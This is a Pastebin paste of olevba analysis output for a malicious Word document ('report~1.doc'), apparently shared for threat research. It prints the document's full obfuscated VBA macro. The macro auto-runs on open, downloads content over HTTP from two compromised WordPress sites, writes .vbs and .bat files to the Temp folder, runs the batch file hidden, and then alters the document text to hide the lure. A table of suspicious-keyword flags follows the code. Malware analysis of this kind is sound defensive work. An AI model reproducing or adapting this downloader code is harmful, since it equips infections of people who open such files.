SHARE
TWEET

Malicious Word macro

dynamoo Sep 16th, 2015 126 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V report~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: report~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: report~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub Auto_Open()
  17.     Kuricknms
  18. End Sub
  19. Sub Kuricknms()
  20.     QJKHWDJKASD = "qjwhekj 12 gejhhkasjdh kg12hjdg ahjsgd"
  21.     Subkaka
  22. End Sub
  23. Sub AutoOpen()
  24.     Kuricknms
  25. End Sub
  26. Sub Subkaka()
  27.    
  28.     Dim NJKAWD As String, OOODJWD As String, SSPCKDSD As String
  29.     Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String
  30.     Dim PBIn As String, KnsdD As Date, CONT As String
  31.     Dim Ndjs As Integer
  32.     Dim ABTH As String, BBTH As String
  33.     Dim klmn As Integer, TTKK As String
  34.    
  35.     Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer
  36.    
  37.     KnsdD = #2/12/2010#
  38.    
  39.     SSPCKDSD = spb(90 + 0 + 2)
  40.     NJKAWD = Samsung(9898)
  41.     OOODJWD = "Temp"
  42.     PH2 = Module1.Jkjdnda(OOODJWD) + SSPCKDSD
  43.      
  44.     ART = 315
  45.     BFT = 316
  46.    
  47.     Randomize
  48.     Ndjs = Int(Year(KnsdD)) - 1906
  49.     ATTH = hhr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + spb(8 + Ndjs)
  50.     ATTH = ATTH + "://"
  51.  
  52.     TSTS = ".tx" + "t"
  53.     CDDD = "66836487162" + TSTS
  54.     LNSS = "sasa" + TSTS
  55.     STT1 = "site/"
  56.     STT1 = "thebackpack.fr/w" + "p-content/themes/salient/wpbakery/js_composer/assets/lib/prettyphoto/images/prettyPhoto/light_rounded/"
  57.     STT2 = "obiectivhouse.ro/w" + "p-content/plugins/maintenance/load/images/fonts-icon/"
  58.     PBIn = ATTH + STT1 + CDDD
  59.    
  60.     CONT = Module2.Huqwhdkjqwl(PBIn)
  61.     BHJD = Right(CONT, 15)
  62.    
  63.     hdjshd = InStr(1, BHJD, "exit")
  64.     If (hdjshd = 0) Then
  65.     NJKQWD = ""
  66.     PBIn = ATTH + NJKQWD + CDDD
  67.     CONT = Module2.Huqwhdkjqwl(PBIn)
  68.     NFBH = Module2.Huqwhdkjqwl(ATTH + NJKQWD + LNSS)
  69.     Else
  70.     NFBH = Module2.Huqwhdkjqwl(ATTH + STT1 + LNSS)
  71.     End If
  72.    
  73.     Module2.Crispy (1)
  74.    
  75.     CPLRP1 = "pioneer"
  76.     CPLRP2 = "paytina"
  77.     CPLRP3 = "cr" & "anberry"
  78.    
  79.     CONT = Replace(CONT, CPLRP1, PH2, 1)
  80.     CONT = Replace(CONT, CPLRP2, NFBH, 1)
  81.     CONT2 = Replace(CONT, CPLRP3, NJKAWD, 1)
  82.    
  83.     TTKK = "$"
  84.    
  85.     klmn = CInt(Len(CONT2))
  86.     For i = 1 To klmn
  87.         If (Mid(CONT2, i, 1) = TTKK) Then
  88.             If (Mid(CONT2, i - 1, 1) = TTKK) Then
  89.                 GEFORCE1 = Mid(CONT2, 1, i - 2)
  90.                 GEFORCE2 = Mid(CONT2, i + 1, klmn - i)
  91.             End If
  92.         End If
  93.     Next i
  94.    
  95.     HQUJD = ".v"
  96.     ABTH = PH2 + NJKAWD & HQUJD + "bs"
  97.     BBTH = PH2 + NJKAWD + ".bat"
  98.    
  99.    
  100.     Open ABTH For Output As #ART
  101.     Print #ART, GEFORCE1
  102.     Close #ART
  103.    
  104.     Module2.Crispy (1)
  105.      
  106.     Open BBTH For Output As #BFT
  107.     Print #BFT, GEFORCE2
  108.     Close #BFT
  109.    
  110.     Module2.Crispy (1)
  111.    
  112.     QUHDQ = Module2.Fuflmdjoo(BBTH)
  113.     Module1.Hameleon
  114.    
  115. End Sub
  116. Sub Workbook_Open()
  117.     JHQDJBASND = "asdbj ashdksajhdjksa"
  118.     Kuricknms
  119. End Sub
  120. Public Function NHdjhasbdhas(a As Object)
  121. NHdjhasbdhas = (a.responsetext)
  122. End Function
  123. Public Function Samsung(a As Integer)
  124. Randomize
  125. Samsung = CStr(Int((a / 2 * Rnd) + a))
  126. End Function
  127. Public Function Creasqwdqwjdk(a As String)
  128. Creasqwdqwjdk = CreateObject(a)
  129. End Function
  130. Public Function spb(sps As Integer)
  131. spb = Chr(sps)
  132. End Function
  133. Public Function Stkjrhbs(a As Integer)
  134. Stkjrhbs = Sgn(a)
  135. End Function
  136.  
  137.  
  138.  
  139.  
  140. -------------------------------------------------------------------------------
  141. VBA MACRO Module1.bas
  142. in file: report~1.doc - OLE stream: u'Macros/VBA/Module1'
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144.  
  145. Sub Hameleon()
  146. Dim ij As Integer
  147. Dim charCount As Integer
  148. charCount = ActiveDocument.Characters.Count - 1
  149. QJKDD = "k"
  150. QJHWDSAD = "qwdhjqwk dhkjd d"
  151. JFQW = "t"
  152. ij = 0
  153. Do While True
  154.     ij = ij + 1
  155.     If (ActiveDocument.Characters(ij) = QJKDD) Then
  156.         MBASNMDBW = "qwmdh njh1jaskjhdk h1klh adjks"
  157.         If (ActiveDocument.Characters(ij - 1) = JFQW) Then
  158.             ActiveDocument.Range(Start:=0, End:=ij).Delete
  159.             ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
  160.             Exit Do
  161.         End If
  162.     End If
  163.     If (ij = charCount) Then
  164.         Exit Do
  165.     End If
  166. Loop
  167. End Sub
  168.  
  169. Public Function Jkjdnda(sps As String)
  170. JKQHWDS = "wq,mnd,mn1djlkasjd kljddk12jdkl j"
  171. Jkjdnda = Environ(sps)
  172. End Function
  173.  
  174.  
  175.  
  176.  
  177. -------------------------------------------------------------------------------
  178. VBA MACRO Module2.bas
  179. in file: report~1.doc - OLE stream: u'Macros/VBA/Module2'
  180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  181.  
  182. Public Function Kakarumba(n As Integer)
  183. Dim i As Integer
  184. Dim hduw As Integer
  185. For i = 1 To n Step 1
  186.     Randomize
  187.     hduw = Rnd
  188.     Kakarumba = Kakarumba + hhr(Int(121 * hduw) + 90 + 7)
  189. Next i
  190. XQKLJDHJQ = "qwdkh2 k1hdlkjk21 dhjgasd"
  191. End Function
  192. Public Function Fuflmdjoo(a As String)
  193. Dim bydd As Variant
  194. bydd = Shell(a, 0)
  195. BJQHBDADS = "asdhjk qdhjqkwhdk qwhdlkj dkhasd"
  196. End Function
  197. Public Function Huqwhdkjqwl(nbqjbdjqw As String)
  198. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, NNNMMHWDKJHAJSdsajgdh As Object, BHJQGWD As String
  199. Dim jahsghjJkhsd As String, dddc As Integer, QYDGGJASSSS As String, AsaHuhqdjhasd As String, hqudhhajs As String, AAHQJD As String
  200. AsaHuhqdjhasd = nbqjbdjqw
  201. JKAHJKSD = AsaHuhqdjhasd
  202. jahsghjJkhsd = AsaHuhqdjhasd
  203. 'asdhjsak dgashjdg as
  204. JQHWD = Chr(Round(4.55, 1) + 0.4 + 72)
  205. HQUD = JQHWD + "L2.S"
  206. Dim hquwd As Date, ajsid As Integer
  207. hquwd = #5/10/2011#
  208. ajsid = Int(Month(hquwd))
  209. Randomize
  210. BHJQWD = klmn(68 + Int(Month(DateAdd("m", 1, "6/3/06"))))
  211. dddc = 4 - ajsid
  212. HQDUQ = hhr(Val(81 + dddc))
  213. hqudhhajs = klmn(Val(78 + dddc))
  214. BHQDHJWQDW = HQUD + "erver" + "XML" + BHJQWD
  215. BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ
  216. 'akjshdj ashdk sd
  217. 'asdhkajks dhajsgd
  218. QYDGGJASSSS = "E"
  219. NNNHDQYUWG = hhr(11 * 2 * 4 + 4 * dddc)
  220. QYDGGJASSSS = hhr(71) + QYDGGJASSSS & NNNHDQYUWG
  221. DWQJDIQWDKWQJDHBB = hqudhhajs + "SX" + BYGDWHQGWHDWQ
  222. 'asdhgajs gdhajsg dsa
  223.  
  224. 'asdhgajs gdhajsg dsa
  225. Set NNNMMHWDKJHAJSdsajgdh = CreateObject(DWQJDIQWDKWQJDHBB)
  226. 'anbdqmnbdqw bdnmq dqw
  227. NNNMMHWDKJHAJSdsajgdh.Open QYDGGJASSSS, jahsghjJkhsd
  228. NNNMMHWDKJHAJSdsajgdh.Send (BHJQGWD)
  229. AAHQJD = ThisDocument.NHdjhasbdhas(NNNMMHWDKJHAJSdsajgdh)
  230. Huqwhdkjqwl = AAHQJD
  231.  
  232. End Function
  233. Sub Crispy(NSee As Long)
  234. Dim NnSke As Long
  235. NnSke = Timer + NSee
  236. Do While Timer < NnSke
  237. DoEvents
  238. Loop
  239. QJKHWD = "asdjhjk qhdjq kwdh hd "
  240. End Sub
  241.  
  242.  
  243. Public Function klmn(pag As Integer)
  244. klmn = Chr(pag)
  245. End Function
  246.  
  247. Public Function hhr(sps As Integer)
  248. hhr = Chr(sps)
  249. End Function
  250.  
  251.  
  252.  
  253. +------------+----------------------+-----------------------------------------+
  254. | Type       | Keyword              | Description                             |
  255. +------------+----------------------+-----------------------------------------+
  256. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  257. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
  258. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  259. | Suspicious | Open                 | May open a file                         |
  260. | Suspicious | Shell                | May run an executable file or a system  |
  261. |            |                      | command                                 |
  262. | Suspicious | CreateObject         | May create an OLE object                |
  263. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  264. |            |                      | strings                                 |
  265. | Suspicious | Environ              | May read system environment variables   |
  266. | Suspicious | Output               | May write to a file (if combined with   |
  267. |            |                      | Open)                                   |
  268. | Suspicious | Print #              | May write to a file (if combined with   |
  269. |            |                      | Open)                                   |
  270. | Suspicious | Lib                  | May run code from a DLL                 |
  271. | Suspicious | Lib                  | May run code from a DLL (obfuscation:   |
  272. |            |                      | VBA expression)                         |
  273. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  274. |            |                      | be used to obfuscate strings (option    |
  275. |            |                      | --decode to see all)                    |
  276. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  277. |            |                      | may be used to obfuscate strings        |
  278. |            |                      | (option --decode to see all)            |
  279. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  280. |            | Strings              | may be used to obfuscate strings        |
  281. |            |                      | (option --decode to see all)            |
  282. +------------+----------------------+-----------------------------------------+
RAW Paste Data
Challenge yourself this year...
Learn something new in 2017
Top